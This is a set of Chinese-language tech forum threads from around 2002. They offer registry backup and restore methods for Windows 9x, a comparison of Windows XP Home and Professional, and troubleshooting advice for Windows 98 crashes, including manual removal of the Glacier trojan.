    Win9X系列操作系统的注册表，实际上是一个数据库，它以分层结构存储着整个计算机的系统配置以及大量应用程序的安装使用时要调用的各种信息等。它由3个相对独立的注册表文件组成：系统配置注册表文件：system.dat、用户平台配置注册表文件user.dat和网络管理注册表文件config.pol。它们存储在Windows目录中，其中system.dat中存储着当前计算机的配置，特别是各种即插即用设备的硬件配置，如设备的I/O地址、中断号（IRQ）以及DMA的值等；user.dat主要用来定义用户的优先权，存储着特定于某一用户的应用程序的安装信息等；而config.pol则是只有当Win98的用户安装了系统策略编辑器后才会生成的注册表文件，它存储的设置可以对网络用户的操作做出限制。一般而言，组成一个完整的注册表文件系统，system.dat和user.dat这两个文件是必不可少的。

    一、文件备份还原法

    显然，及时、正确的备份能够在计算机发生意外时，比较完全地恢复整个工作进程。对注册表进行的备份也一样，利用在正常工作状态下备份的注册表可以用来恢复发生错误的注册表，从而达到使系统重新恢复正常工作的目的。

    (一)备份

    1简单拷贝法

    备份注册表就是备份system.dat和user.dat这两个文件。它们的文件属性都是系统、隐藏、只读的，因此一般情况下无论在DOS还是Windows窗口状态都是不可见的，在备份时要注意使用一些“技术”。

    在DOS状态下，请先进入Windows目录，然后键入命令“Attrib －h －r －s system.dat”，对于user.dat同样操作，此时就可以将这两个文件复制到其他的目录中去了。

    在Windows窗口状态下，在【查看】中选择【文件夹选项】→【查看】，在【隐藏文件】中选择【显示所有文件】，这样system.dat和user.dat才能在文件夹窗口中显示出来。剩下的复制工作应该就不用我多说了吧。

    2注册表导出法

    将注册表导出，也是一种不错的注册表备份方法。在【开始】→【运行】栏中运行【Regedit.exe】，选【注册表】→【导出注册表】，最后选择导出注册表文件的存储位置就可以了。要注意的，在导出注册表时，千万要在【导出范围】中选择【全部】，否则导出的注册表文件不完全，将无法用来恢复原注册表。采用此方法备份后只生成一个文件，它的文件名的后缀是.reg。

    (二)还原

    1简单拷贝法的还原

    还原的方法当然是重新用备份的文件覆盖现有文件。不过要注意的是，在覆盖现有文件前，同样得先将system.dat和user.dat的文件属性全部取消，否则系统会拒绝覆盖操作。在还原前请务必启动到DOS状态下，然后再进行此操作。千万不要在Windows或Windows的DOS窗口下进行此还原操作，否则不但不能恢复注册表，反而会对注册表产生极大的破坏。

    2注册表导出法的还原

    利用注册表导出法的注册表文件还原系统时，既可以在Windows下进行，也可以在DOS下进行。 　　在Windows下进行时，运行注册表后选【注册表】→【导入注册表】，选择要导入注册表文件的所在位置，重新启动后就可以恢复注册表。虽然此法无论在安全模式还是正常方式下都可以进行，但为了保险起见，笔者还是建议最好在安全模式下或是干脆用下面介绍的在DOS下进行操作。 　　在DOS下只能以命令行的方式运行Regedit.exe，但它可以解决无法进入Windows情况下的注册表恢复问题。其命令行形式：

    Regedit [/L: system] [/R: user] filename1

    Regedit [/L: system] [/R: user] /C filename2

    Regedit [/L: system] [/R: user] /E filename3 regpath1

    Regedit [/L: system] [/R: user] /D regpath2

    参数含义：

    /L: system 指定system.dat文件的存放位置；

    /R: user 指定user.dat文件的存放位置；

    filename1 指定导入的注册表数据库文件名；

    /C filename2 利用指定的注册表文件重新生成注册表；

    /E filename3 导出注册表文件为指定文件名；

    regpath1 将指定开始关键字的部分从注册表文件中导出；

    /D regpath2 将指定开始关键字的部分从注册表文件中删除

    具体在恢复注册表时，可以采取命令行1的形式：Regedit bak.reg（假设你导出的备份注册表文件为此文件名）。不过建议采用命令行2的形式，即：Regedit /C bak.reg，因为此命令不但会将bak.reg中的所有信息导入注册表，而且会将其中的一些无用的信息（如一些已经被删除的程序在注册表中的残留部分关键字等）同时剔除，从而达到压缩重建注册表的目的。

    顺便提一下，命令行2也不一定要在恢复注册表才使用，平时运行也能压缩、清除注册表中的“垃圾”，从而起到提高Windows启动速度，减少注册表错误发生几率的作用。笔者就曾经利用此命令将原来6兆的注册表压缩为4兆。要注意的是，在使用此命令时，请务必在运行前加载磁盘缓冲smartdrv，否则它的运行时间之长或许足够你去看一场电影了！

    二、系统备份法

    正是由于注册表对于系统的重要性，微软在开发Win95时就考虑到系统对于注册表的自动备份问题。尽管它所提供的功能直到Win98才令人稍感满意，但毕竟这也不失为修复注册表的方法之一。

(一)Windows 95

    当初Win95各版本中提供的系统自动备份注册表的方法比较简单，通常是在Windows系统启动的同时，将当前的注册表文件备份。具体的做法就是将system.dat和user.dat这两个文件分别备份为相同属性的system.da0和user.da0。因此，当系统因注册表遭破坏无法启动时，可以手工将system.da0和user.da0这两个文件拷贝并覆盖system.dat和user.dat（请注意在操作前，分别将这4个文件的文件属性全部取消）。尽管这种想法不错，但由于疏忽和一些无法预料情况的发生，系统自动备份的注册表经常会在不知不觉中被破坏或备份失败。例如：①当注册表的破坏是在上 　　次关机以前发生的，而当你再次启动系统时，备份的注册表其实就是已经遭破坏的注册表的“完全”拷贝了；②启动时注册表为正确的，此时系统自动备份的注册表也是好的，但在系统启动过程中发生意外（如突然停电、硬盘意外读写错误等）导致系统启动失败，当你再次启动时，原来完整的注册表备份也会被已经遭破坏的注册表覆盖。因此，利用system.da0和user.da0这两个备份文件来恢复注册表的效果不是十分令人满意，成功率一般在50％左右。要注意在一次启动失败后，尽量不要试图再次启动，应该立即用system.da0和user.da0这两个文件来覆盖恢复，否则90％以上你的系统是再也无法恢复的了。

    (二)Windows 98

    Win98对注册表文件备份系统的改进之处主要体现在以下两个方面：①备份文件不仅包括system.dat和user.dat，还包括了system.ini和win.ini这两个初始化文件，大大提高了系统还原的完整性；②备份文件被统一地压缩在一个文件中，而且备份压缩文件的数量大大增加，避免了在Win95下一个备份容易发生错误无法恢复的现象。 　　Win98将注册表的备份文件放在了Windows下面的隐藏子目录Sysbckup中，备份文件以rbX为名，都是CAB格式的压缩文件，每个文件包含system.dat、user.dat 、system.ini和win.ini。默认情况下，系统共留有5个（X从000到004，如果某次有错误，数字往后顺延）压缩包备份，这5个压缩包备份分别是你最近5个工作日中第一次启动计算机时系统所做的备份。请注意，并不是最近5次，举个例子，如果你每天都使用计算机，那么这5个备份中保存的分别是5天来每天你第一次启动计算机时的注册表文件。当某次启动发生错误时，系统会将这时的注册表文件另外保存为rbbad.cab，以供使用者分析、寻找发生错误的原因所在。 　　了解了Win98的备份原理后，对于注册表的还原就比较轻松了。如果你可以进入Windows（哪怕是安全模式），想进行备份还原的话，只要用Winzip等支持CAB压缩格式的软件选择最近的或是前几天的备份压缩包文件，并将其中的4个文件解压出来，重新启动计算机到DOS状态，利用这些文件覆盖相应同名文件就可以了。如果你在启动的时候就无法进入Windows的话，那么可以尝试在DOS下进行备份还原工作：①利用Windows提供的extract.exe文件，用命令行方式将备份文件展开，直接对系统注册表文件进行覆盖还原（假设当前目录为Windows）：extract /Y . Sysbckup\ rbX.cab，其中X为000～004。②利用Windows附带的scanreg.exe，在DOS状态下运行此程序，按提示选择检查注册表，在程序检查完注册表后，可以看到【Create Backups】和【View Backups】这两项，前者用来将当前的注册表备份下来，后者用来查看以前备份的注册表情况。选择后者，屏幕将显示近日来的各备份注册表文件情况（主要是备份的时间），选择你想还原的备份，按回车，然后选择【Restore】开始还原，还原完毕后选择【Restart】重新启动计算机就可以了。

    注意，当你第一次启动计算机失败后，请不要不断地继续尝试启动计算机，因为scanreg.exe会将启动失败的注册表都一一依次备份下来，如果你连续启动失败5次的话，也就意味着原先备份的5个完好的注册表都将被这连续5次的坏注册表所替代，也就失去了利用它们来还原系统注册表的机会。因此，在启动失败后，请尽量不要一而再再而三地连续启动，应及时地进行注册表还原工作。

亡 羊 补 牢 篇

    古人云：亡羊补牢，为时未晚。如果你从来就没有备份注册表的习惯，或是在Windows下所有的系统自动备份都已经如前所述被已遭破坏的注册表文件所替代了的话，那么试试下面的方法，或许能使你的机器再次正常地运转起来。

一、保守还原法

    一般而言，当Win9X在成功安装完毕后，会自动将第一次正常运行时的系统信息（其实也就是注册表信息，主要是相应的硬件信息）保存在C盘根目录下的system.1st这个文件中。利用它，有可能将系统恢复到最初安装时的状态。具体的做法如下：在DOS下，首先去除system.1st以及Windows目录下system.dat的文件属性（它们都是系统、只读、隐藏属性），然后将system. 1st拷贝为system.dat来覆盖系统的system.dat，最后重新启动计算机。如果启动成功，还得对系统进行大幅度地调整才能恢复到破坏前的状态。

二、“李代桃僵”法

    如果有和你的硬件配置大致相同的计算机，可以用那台计算机上的注册表文件（system.dat和user.dat）来覆盖自己计算机上的注册表文件，然后启动。如果可以进入Windows，再对系统做相应的修改，就能恢复如初了。尽管这种方法成功的概率比较小（大约在25％左右），但这也是不得已而为之，或许能将你的“死马”真的医活了。 　　如果上面的招数对你都无效，那我再教你一记“超级绝招”——准备好你的Windows安装光盘，然后Setup吧！笔者凭着对注册表的了解（经常在里面修修改改）以及以上几大绝招，创造了自上年10月安装Win98至今没有重新安装的个人新记录。

寂寞的《鸵鸟γδξπηφ》啊～～我在像野驴一样疯狂的奔跑！
上一贴 | 下一贴
快速回复 主题：注册表完全恢复手册（因我本人非常喜欢注册表）
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


Windows XP选择 Pro还是 home～？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
Windows XP选择 Pro还是 home～？

上一贴 | 下一贴
发表人 主题: Windows XP选择 Pro还是 home～？
鸵鸟γδξπηφ

高级用户
积分：219
发帖：55
来自：
注册：2002-01-27
 发表于 2002-01-29 08:56:29 按此观看鸵鸟γδξπηφ的个人资料 按此发邮件给鸵鸟γδξπηφ 收藏该主题供以后查看 发送悄悄话给鸵鸟γδξπηφ 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看鸵鸟γδξπηφ的IP
这篇文章我觉得很好 阐述了目前流行的 XP专业版与HOME版的选择问题！请大家看看。

winxp的简体中文专业版和家庭版价格相差三分之一，对于那些买正版的用户们来说，就有必要考虑一下买哪个版本，因为价格毕竟差很大。

    这两个版本的内核是一摸一样的，但 home 相对 professional（一下简称pro） 做了精简（其实不能简单地将它看作一个精简版本），那么到底在那些方面进行了“精简”呢？

    下面就逐一介绍，以备选择版本时参考。

    1、硬件支持

    · home 对硬件的支持不及 pro。pro支持“SMP”，就是说，pro 的系统可以有两个处理器一起工作，而 home 如果在两个处理器的机器上只用一个处理器；

    · home 不支持64位的处理器，而 pro 支持，在64位的处理器上，home是不工作的；

    · home 对多硬盘的支持跟 win9x 和 winme 是相仿的，而 pro 支持 “dynamic disks”(动态磁盘，继承至 win2k ），能够很好地处理多硬盘的机器，一个卷（就是我们讲的c盘，d盘这些逻辑盘）的物理空间可以不同的数个硬盘上，最多支持32个硬盘，盘符的分配也是动态自动识别的，不会出现以前需要高手解决的盘符错乱问题。

2，网络和安全支持
· home 不支持 IIS ，就是说，你的机器就不能作为网络服务器，也就意味着你的机器不能开ftp，也不能把网页在自己的机器上发布。pro 的 IIS 也不是默认安装，需要从安装盘补装。

    · home 在安全设置方面跟 pro 有很大的距离，home 是不支持文件加密系统的，也不支持“IPSec”，也不能进行复杂的文件访问权限设置。

    · home 不支持“远程桌面连接”。winxp 中有个有个新玩艺叫做“远程协助”，这个在两个版本的 winxp 中都有，它是用来提供远程帮助的，按照微软的说法，还可以用来做培训。“远程桌面连接”有别于“远程协助”，他提供给不同级别的访问者相应的权限进行访问，而访问者可以可以是windows系列里的任何一个版本。

    · home 的系统在网络中的地位与 pro 是不一样的，home 可以访问服务器和网路打印机，但是它不能成为一个“域”的成员，而 pro 就能。进而，pro 就能够使用基于域的的管理工具，比如“组策略”等。

    3、旧版升级

    在windows以前的版本中已经积累了大量工作的朋友，是不太愿意新装系统，并为此化大量的时间来把以前成千上万的文件备份好——虽然新装被认为有利于系统性能提高。那么 pro 和 home 在升级上有什么不同呢？ home 只能从 Windows 98, Windows 98SE, ， Windows ME 升级。而 pro 除了能从这些升级外还能从 Windows NT 4.0 Workstation, Windows 2000 Professional 和 winxp home 这个同门兄弟升级。

    win95 的朋友看到了，自己是不能直接升级了，不要慌，来个“两级跳”，比如，先升级到 win98，而后再升级到 xp。强行从 win95 升级也是能做到的，但要做一些处理。

    要指出的一点是，由于 win9x 的内核与 winxp 是不同的，能新装最好新装，而从NT内核的系统升级相对较好。

    4、硬件升级

    这个问题跟选择 pro 还是 home 倒没关系，但跟升级有关系，在这里一并讲清。许多朋友装xp时考虑一个硬件升级的问题，因为许多人都在传xp的要求系统盘3G，内存256M等等，其实，128M内存在大多数情况下是足够了。当然最好是256M。

    有一个经常被提起的疑问，就是如果现在还用128M，以后想升级倒256M时会不会遇到机器被“lock”，要去微软重新激活的麻烦？好像盛传会遇到麻烦。其实不是，微软也不至于这么没有人性的，他也知道许多人是要经常升级硬件的。一般的升级，比如加内存，加硬盘，换光驱等等都不会带来要重新激活的问题，但当你的硬件变化积累到一定程度（比如变化到几乎是换了台电脑）是有可能引起这种问题的。

    对硬件更换会产生“激活”问题的的恐慌大概是由卖硬件的人传播开的，原因不眼自明。

5、默认配置

    出于对两个版本设计对象上的不同，两个版本新装后的各种默认设置是有所不同的。一装完系统就能看到的比如 home 中任务栏是锁住的，而 pro 却相反；二者的设置要突出的重点不同，home 更强调多媒体等家庭常用和看重的工具；安装过程中，设置帐户的过程也是不同的，home 更简单,两个版本的帮助文档也是不相同的，home的内容要少一些，文字也不尽相同。

    看了上面的分析，大家一定心里有底了，但我在这里要提醒一点：很多人看到 home 有这么多“缺”，心里就想买个“全”的，这叫“宁滥勿缺”，其实对大多数家庭用户来说， home 的功能都用不完，你仔细想想，你每天在电脑上做的事就固定的那么几件，装 pro 也许适得其反 ，那些“全”的东西不仅“占”你的钱，还占电脑的资源，许多“优化xp”的技巧其实就是把那些“全”的减掉，何必呢？

寂寞的《鸵鸟γδξπηφ》啊～～我在像野驴一样疯狂的奔跑！
cfluodongyu2

超级用户
积分：336
发帖：84
来自：
注册：2002-05-18
 发表于 2002-06-16 02:04:18 按此观看cfluodongyu2的个人资料 按此发邮件给cfluodongyu2 cfluodongyu2 的 oicq 是17696170,查看 17696170 的资料 发送悄悄话给cfluodongyu2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cfluodongyu2的IP
我装的是D版XPPRO，效果还不错，不过为什么在P4机器上总会有假死机现象呢。

好的交流能使我们走近完美！
DW5

阻击之眼
积分：3356
发帖：3063
来自：blueidea
注册：2001-07-29
 发表于 2002-06-16 06:50:34 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
楼上的：去下载个假死机补丁就可以了

home是pro价格的3/1，但pro比home的性能高3/1，这样不难选择吧？？？

home，顾名思义，给家庭用的，满足一般的娱乐、游戏

Pro，一样，专业的，性能至上，给公司用

再说微软也不肯让公司用home吧？？会不会罚款的？？等于是盗版了吧？

修身，养性，治国，平天下
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-06-16 17:59:09 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
只凭home不支持域登录，大部分公司就不会选择home了

等我想想再签
上一贴 | 下一贴
快速回复 主题：Windows XP选择 Pro还是 home～？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


关于系统崩溃，非法操作，大家都看看 - 经 典 论 坛

计算机技术
关于系统崩溃，非法操作，大家都看看

上一贴 | 下一贴
发表人 主题: 关于系统崩溃，非法操作，大家都看看
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-19 09:38:42 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 收藏该主题供以后查看 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
见坛子上有不少人问非法操作导致系统崩溃的解决方法，今天就整理了一下，主要是一些“伺候”系统基本方法，还有就是一些关于非法操作的认识

防止系统崩溃

无论第三方工具的功能多么强大，能修则修始终是我们最先考虑的方案，而重装Win98实在是迫不得已而为之。修复出错的Win98情况非常复杂，对于新手而言，如果使用了以下几招仍未见效，再去深究可能事倍功半，不如转而考虑其它办法。

完全卸载软件:有些朋友在卸载程序时，没有采用正常的卸载方法，而是直接将该程序所在文件夹删除，有可能造成系统启动时找不到文件，此时应该将该程序重新安装，再从“控制面板→添加/删除程序”中或从程序组中进行卸载。

恢复注册表:注册表是Win98存放系统关键信息的文件，当由于频繁、错误地装卸软件或遭病毒破坏等原因造成注册表损坏时，操作系统也就会产生各种各样的问题，这时应该利用备份注册表进行恢复。备份注册表的方法有几种:一是备份Windows目录下的System.dat和User.dat两个文件，恢复时只须将备份文件覆盖目标文件；二是从“开始→运行”中执行注册表编辑器Regedit.exe，然后选择“注册表→导出注册表文件”(图1)，导出范围选为全部，恢复时从注册表编辑器中选择“导入注册表文件”，将先前保存的文件导入；三是运行Scanregw进行备份，但恢复时也需使用该命令。如果没有手工备份注册表，也不要着急，Win98已经为我们备份了最近5次开机时的注册表，保存在Windows＼Sysbckup下的5个压缩包中，恢复时进入纯DOS状态，进入Windows目录执行“Scanreg /Restore”，从5个不同时间的注册表中选择要恢复的即可。

提取丢失的系统文件:误删除系统文件(比如Vxd或者Dll文件)也是造成Win98不稳定的原因，如果知道丢失的文件名称，可以采用多种方法从Win98安装盘中提取该文件:首先应使用Win98自带的系统文件检查器，从“系统信息”程序的“工具”菜单中或者直接运行SFC命令都可启动该程序，选择“从安装软盘提取一个文件”，键入文件名称(图2)，(图)点击“开始”，继而指定Win98安装盘路径和文件释放路径，点击“确定”，选择是否备份源文件，然后该程序会自动从安装盘数十个CAB压缩包中寻找并提取该文件；如果进不了图形界面，可以在DOS下利用EXT命令，该命令需配合Extract使用，但功能更强，既可自动搜索压缩包，又可使用通配符，这一点比系统文件检查器还要方便。使用时按提示依次输入安装盘路径、提取文件名称、释放目标路径，最后按下Y键确认即可。

如果自己的修补技术还不到家，那就要重视预防了，即时恢复软件将是你最好的选择。这类软件与克隆类软件原理不同，具有占据硬盘空间少、恢复速度快等优点，大家听过的超级保镖就属此类，但目前最优秀的当数瓦瑟科技推出的“即时恢复系统2001”，英文名为Pro Magic 5.12，该产品的主要特色是:1.系统即时还原，当系统紊乱时，重启就能立即还原；2.占用空间少，再多的数据也只需100MB(想想Ghost几百兆的空间占用吧)，额外备份仅需十余MB；3.操作便利、运行稳定、中文界面、分辨率可调；4.提供双重密码，加强系统安全；5.可保护CMOS资料，防止低级格式化，防止软盘启动；6.多重开机，支持22个开机盘，每个开机盘都会得到保护……安装的注意事项:Pro Magic属于商业软件，从华军可下载到957KB的共享版。安装该软件需要注意几个问题:1.关闭BIOS中的病毒防护和电源管理功能；2.保证操作系统位于硬盘第一个分区，并且分区未被Windows压缩。做好这些工作后就可进行安装了，双击Setup文件，接受版权说明，点击下一步开始安装,接下来系统会询问你是否要对硬盘执行扫描及碎片整理，如果你确信自己的硬盘没有问题的话，可以跳过此步骤。重启后Pro Magic先于Windows启动，首先会让你选择该软件运行时的显示模式，接下来让你确认硬盘分析结果是否正确，确认无误后继续输入姓名、产品序列号，最后进入Windows完成安装。安装后，在C盘根目录下，会多出一个DRVSPACE.999文件，大小为100MB。呵器械，这里记录着你的主分区信息，别把它删除了。Pro Magic的基本使用:每次开机时，该软件会自动运行，首先让你选择以用户身份还是管理者身份进入系统，按F10就可进入管理者模式，否则直接回车即可。接着出现一个菜单，共有启动、临时储存、还原、储存四个选项(图3)(图)，“启动”意味着直接进入Win98，“还原”则可从曾经储存的镜像文件中进行恢复，“临时储存”将为当前分区进行新的备份(存放在C:＼PROMAGIC路径下，大小在10MB左右)，“储存”则更新最初的备份DRVSPACE.999文件。选择启动进入Win98，该软件将会弹出窗口，提示当前是处于保护还是未保护状态，在保护状态下，你可以随意操作被保护的分区，装卸软件，甚至格式化，如果系统出现了问题，只须重启机器，在菜单中选择还原，一个完好如初的系统又展现在你的眼前了。

如果你对最初的镜像不满意，可以在更改后重启时选择“储存”，如果想多储存几个镜像，可以选择“临时储存”，但这两个功能需要用户自己打开，方法是开机时进入管理者模式，左侧会出现一排按钮，将用户管理→禁用选项中的“临时储存”和“储存”设为“允许”即可。在管理者模式中有个“安装”按钮，选择它进入Win98将不受保护，所有操作都将更新最初的备份文件，还原时也就无法回到最初状态了。Pro Magic还有许多实用功能，如添加密码、CMOS保护等等，建议大家仔细阅读说明书。该软件唯一的缺点就是每次开机都要进行确认，稍嫌麻烦。

除了上面提到的两种方法，克隆大法也是不少人喜欢的一剂“猛药”。克隆软件多是以簇(Cluster，是一个分区内所能分配的最小空间)为单位进行复制，所以建立的镜像文件的结构和源分区完全一样。系统损坏时，只须将该镜像文件恢复到目标硬盘或分区中，系统就能完好如初了。此类软件有Norton Ghost、Drive Image Pro等，其中以Ghost使用简便、功能丰富而应用最广。但是如果没有预先备份，那就只能用最麻烦的办法——重新安装系统来解决问题了。

以上都是用电脑应该掌握的技巧 ， 接下来说说 win 的 非法操作问题

在兼容机的操作过程中“非法操作”是很常见的故障现象。经过长时间的摸索和资料的搜集、整理，明白了它的成因及找到了不少对该故障的解决方法。不敢独享，特奉献给广大读者，让大家摆脱“非法操作”的困扰。

在Windows 9x系列中，是用保护模式来管理内存的。所谓保护模式，就是由Windows 9x给每个程序分配系统资源和访问权限。这样一来，将会减少一些不必要的内存占用。但是，当某个应用程序试图侵占其他应用程序的系统资源，或是越权使用的时候，就会出现“非法操作”。“非法操作”造成的原因很复杂，不仅可以由软件问题引起，也可由硬件引起，还有病毒也来作怪。下面，将分软件及硬件两方面的原因给予介绍。

软件方面

1.由软件自身的不完善(BUG)引起:

典型例子：Photoshop图形软件在运行时产生的“非法操作”。

解决：将软件升级为高版本或升级补丁程序。如安装Windows 98的sp1就非常必要了。运行期间，应减少其他程序对内存的占用，可关闭病毒防火墙、减少剪贴板中的不必要内容。也可根据自己的情况，升级一下显卡、声卡、或是显示器的驱动程序或将它们更换成新件。

2.由病毒感染、病毒的残留“僵尸”、冰河木马引起:

典型例子：.DLL文件失效。

解决：(1)在有些病毒的发作过程中，往往会伴随着一些文件的改动。一旦某些重要文件(如.sys .dll .vdx...)被改动过以后，机器会很难正常工作。方法如下：先用干净的引导盘启动微机，后用最新的杀毒软件清除病毒，再用“系统文件检查器”或者“Ext.exe”进行文件的恢复。

(2)终止内存中正在运行的冰河木马,然后进入注册表，删除“KEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current-Version\Run”和“RunServices”的键值；将“HKEY_CLASSES_ROOT\xtfileshellopenco-mmand”的键值改成“C:\Windwos\NOTE-PAD.EXE %1”；重启到DOS，再到硬盘C:\Windows\System中，将Kernel32.exe和Sysexplr.exe删除。

3.由系统文件的损坏或丢失引起:
典型例子：Rundll32程序执行无效，即将关闭。

解决：方法一：当按下“详细资料”按钮时，若显示：“Rundll32 caused a general protection fault in module Mmsystem.dll....”信息，原因很可能就是你的 System.ini 文件里，在[boot]这个区段中，少了：drivers =mmsystem.dll 这一行造成的。你自己补上去就可以解决了。为什么会有这个错误的发生呢？大部分都是由于在使用控制面板“添加新硬件”时，使用不正确而造成的。例如，需要你提供驱动程序而你又不能提供正确的驱动程序造成的。使用记事本，打开位于 C:\Windows 下的System.ini 文件。找到“[boot]”这个区段。补上一行“drivers=mmsystem.dll”。补上后，保存，然后重新开机。

如果你不能确定该故障是由什么原因造成的，可以用“系统文件检查器”，在设置之中，选择“检查删除的文件” 、“检查修改过的文件”，还可以添加新的文件类型来进行检查、恢复。

4.由软件之间的不兼容引起:
典型例子：Windows 98下的KVW3000所引起的“非法操作”。

解决：在前面，曾讲过Windows 9x“内存管理”的概念，病毒软件运行过程中将不遵循这种方式，最终造成“非法操作”的出现。具体方法：对扫毒软件的升级，或者不用病毒防护。还可以不加载 Windows 9x的内存管理程序Emm386.exe。

5.由缓存设置不合理引起:
典型例子：极少出现的，没有规律可循。

解决：遵循缓存的设置规则：

(1)Win386.swp是Windows的“虚拟内存交换文件”，简单地说，就是拿一部分硬盘空间当作内存使用，先把一些内存中闲置太久的程序，放到硬盘上，等CPU要用的时候，再从硬盘的win386.swp里读出来。它的大小按物理内存的2倍来设置。(2)在Windows 98下，使用虚拟设备磁盘缓存Vcache。在“系统配置实用程序”中，找到sysytem.ini，再找到“[vcache]”小节，添入： MinFileCache=16384 MaxFileCache=16384 ChunkSize=512。上面的数值是以64MB为例采取的，一般原则是：物理内存×25%×512=VCache。(3)CD-ROMCache优化，注册表中“HKEY_LOCAL_MACHINE\Systm\CurrentControlSet\control\FileSystem\CDFS”，右边能看到“CacheSize”和“Prefetch”。如果你现在是使用Windows 98推荐的4倍速设置的话，它们的值应该是“0000026b”和“000000e4”，我们需要分开来修改这两个数值，我这里省略了计算方法，大家可以参考以下数据值，并根据自己的需要来修改吧，修改完后需要重新启动。

6.由系统资源匮乏引起:
典型例子：打印或保存时引起的“非法操作”。

解决：升级内存，加大缓存。移除一些不必要的软件，如：桌面主题、屏幕保护、计划任务、声音和输入法指示器、声卡的DOS驱动程序、防火墙、查毒软件、背景、Office 2000的竖式工具栏等等。最好是在启动微机后，先运行比较大的软件。还应加上一个良好的内存管理专家软件。

硬件方面
1.由系统及其系统部件过热引起:
典型例子：SDRAM的过热故障。

解决：选择好一点的散热片和散热风扇，风扇转速要高，散热片的散热面积要大，散热片材质要利于散热，与被散热部件的接触面积要大。内存的散热：现在市场上已经出现了内存的散热片，是一种长方形带圆孔的东西，但是散热体的体积过大，会影响到第二条SDRAM的插位，再就是应当注意机箱通风和不要超频。

2.由硬件质量不好引起:
典型例子：SDRAM的质量不稳定产生的“非法操作”。

解决：首先将BIOS中的内存参数设置得保守一些，如：SDRAM CAS LATENCY的值，设为CL=3。再就是不要超频，实在不行，只有更换内存了。

3.由硬件I/O冲突兼容性差引起:
典型例子：网卡的冲突。

解决：从设备管理中，删除带“?”或带“!”的设备，让系统重新识别一下硬件后，再安装驱动程序。I/O冲突的解决：查看“设备管理器/属性”中的“ 中断请求”，若有冲突，将它进行调整即可。再就是升级一下BIOS程序，也可以解决一些问题。

4.由硬件超频引起的“非法操作”:
典型例子：CPU和SDRAM超频故障。

解决：首先要保证自己的硬件有良好的可超性能，再就是要将散热的危害性降到最小程度，CPU表面温度控制在50℃以内，SDRAM最好在25℃左右。

5.由硬件损坏引起:
典型例子：包括一些接口的损坏，或者是小的电子元件被击穿。

解决：要有专门的仪器和方法来测试，一般很少出现。这里就不多讲了。

结论：上面讲到的，只不过是产生非法操作及解决的一些知识，它只是许多微机故障中的一个方面。下面，谈一谈为减少非法操作所应当知道的一些维护知识：

(1)对机房环境的维护：防尘避免高温、高湿度。

(2)看清故障，不要盲目处理，避免引发其他故障。

(3)做好接地，避免静电的危害。

(4)积极地吸取别人的好的建议，以增加对微机的掌握程度。

(5)定期地进行除尘、除湿的维护。

(6)注意软件版本的不断升级，以减少BUG的危害，增强功能。

(7)意木马冰河的防范、杀毒软件的更新。

(8)保持机箱的稳定性、避免不必要的振动、硬物的冲击。

(9)保持硬盘的数据整洁，定期运行管理软件，如：磁盘扫描、系统文件检查器、磁盘碎片整理、备份程序……

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-19 13:52:13 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
辛苦了

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

欧阳文斌

初级用户
积分：4
发帖：1
来自：
注册：2002-02-22
 发表于 2002-02-22 09:13:02 按此观看欧阳文斌的个人资料 按此发邮件给欧阳文斌 发送悄悄话给欧阳文斌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看欧阳文斌的IP
好好玩

我是小小小黑客???!!!
cfluodongyu2

超级用户
积分：336
发帖：84
来自：
注册：2002-05-18
 发表于 2002-06-16 02:07:35 按此观看cfluodongyu2的个人资料 按此发邮件给cfluodongyu2 cfluodongyu2 的 oicq 是17696170,查看 17696170 的资料 发送悄悄话给cfluodongyu2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cfluodongyu2的IP
这下我可以更详细地解释给我的客户听了，谢谢！

好的交流能使我们走近完美！
上一贴 | 下一贴
快速回复 主题：关于系统崩溃，非法操作，大家都看看
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


BIOS详解 - 经 典 论 坛

计算机技术
BIOS详解

上一贴 | 下一贴
发表人 主题: BIOS详解
继续努力

终级用户
积分：474
发帖：135
来自：
注册：2002-02-16
